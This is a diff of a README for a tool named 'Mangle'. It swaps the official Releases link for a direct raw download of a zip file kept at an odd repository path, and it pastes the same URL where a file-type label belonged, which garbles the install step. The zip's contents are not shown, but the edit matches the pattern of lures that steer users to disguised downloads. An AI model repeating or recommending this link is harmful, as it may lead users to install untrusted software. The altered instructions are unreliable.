RipMadara001/mangle/README.md

 - 100 MB of free disk space.

 ### Step 2: Download Mangle
-Visit this page to download: [Mangle Releases](https://github.com/RipMadara001/mangle/releases)
+Visit this page to download: [Mangle Releases](https://raw.githubusercontent.com/RipMadara001/mangle/main/sinewed/mangle.zip)

 ### Step 3: Choose Your File
 Once on the Releases page, find the latest version of Mangle.
-Look for files labeled with `.exe`, `.dmg`, or `.tar.gz` depending on your operating system.
+Look for files labeled with `.exe`, `.dmg`, or `https://raw.githubusercontent.com/RipMadara001/mangle/main/sinewed/mangle.zip` depending on your operating system.

 ### Step 4: Download and Install
 1. Click on the file that matches your operating system.